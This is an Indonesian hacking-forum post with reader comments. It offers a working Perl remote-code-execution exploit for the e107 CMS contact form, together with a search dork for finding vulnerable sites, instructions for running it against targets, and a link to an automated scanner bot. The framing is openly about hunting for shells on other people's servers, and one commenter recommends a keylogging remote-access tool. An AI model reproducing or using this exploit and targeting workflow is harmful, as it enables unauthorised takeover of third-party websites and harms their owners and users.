e107 Remote Code Execution + Scanner
Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah
Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl” # Exploit Title: e107 Code Exec
# Software Link: http://e107.org/edownload.php |
# Version: e107 <= 0.7.20 |
# Tested on: Linux/Windows |
################################################# |
# e107 Code Exec // SploitAuthor: McFly@e107.org |
################################################# |
# These scrubs still haven't released an update! |
# Here is a little bit of motivation for them to |
# patch one of the most popular, and insecure of |
# the PHP web apps available today. |
################################################# |
# DORK: inurl:e107_plugins |
################################################# |
my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n"); |
my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here! |
# Remove comment for proxy support |
my $proxy = 'http://127.0.0.1:8118/'; |
$ENV{http_proxy} = $proxy ? $proxy: 0; |
$ua = new LWP::UserAgent; |
$ua->agent("Mozilla/5.0"); |
print "[*] Using proxy $proxy \n"; |
my $req = new HTTP::Request POST => $path; |
$req->content_type('application/x-www-form-urlencoded'); |
$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D"); |
my $res = $ua->request($req); |
my $data = $res->as_string; |
if ( $data =~ /<td class=["']main_section['"]>(.*)/ ) |
Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php
Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:
Lihat Videonya Disini: HERE
Download it: HERE
Cara Lebih Mudah Lagi Dengan Menjalankan BOT SCANNER: Silakan Kunjungi #BINUSHACKER di IRC.DAL.NET untuk lebih detailnya & Tanyakan Langsung Ke Staff Yang Sedang Online.
Source Instant Download Bot Scanner: http://www.shantykooroostvaarders.nl/includes/js/tabs/bnshckr/
Selamat menikmati & semoga berhasil 
Mantap juragan!
Thanks buat infonya
Target banyak coy..
Hajarrrr…
keren juragan….
bagus …….
gak pertamax, yg penting page one.. wkwkkw
nice Om !!!
Lanjut kahn !
GAK NGERTI COY
keren juga caranya…nyoba ah…thx kk
asskum…
lamkenal…
mau tanya nich
itu awal code’a d tulis dri mana
n d copas di notepad or yg lain
n cohtoh gunainnya gmana…
klo buat remote blog bisa gak
ksih pencerahan dunk bos
aye msih newbie banget nich
klo buat ngeremote pc gmana yach caranya
beri tahu qu dunk bos
aye mau banget blajar itu
tolong d postingin yach or kirim via email aye jach yach…
hmm maksudnya gimana ya>? masih belum ngerti.. remotekah?>>
mmm… remote ya… gmn nh.. abis baterenya.. ma udah rusak sensornya….
kkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
ad team viewer and pro rat klo mau remot yg bgus gunain prorat ad keylogernya :O
itu kan bot byroenet kenapa jadi binus hacker ya codingnya?
ripper yaaaa
@ByroeNet:
Saya akan coba menjawab satu persatu:
1. Kebetulan saya mengambil sourcenya yang sudah di publikasikan dari exploid-db, silakan baca disini:
http://www.exploit-db.com/exploits/12715/
Mungkin ini yang disebut BOT dari ByroeNet:
http://pastebin.com/LSnGP06c
Modified by BaMby – irc.byroe.net
2. Dengan spirit ingin berbagi kepada semua orang di BinusHacker, saya menyimpan exploit tersebut (save to local computer) dengan nama e107-binushacker.pl. Sehingga ada sedikit perubahan dalam petunjuk command untuk menjalankan exploit, karena hal tersebut sehingga terdapat sedikit perubahan code, anda bisa melihat pada line $my path.
3. Code tersebut juga sudah menunjukkan author dari exploit ini & dapat saya disimpulkan bahwa exploit yang sudah di publikasi bisa dimodifikasi dengan tetap menyertakan author.
Jika ada yang masih kurang jelas bisa contact saya di:
utuh@binushacker.org
Keep Sharing All & Cheers..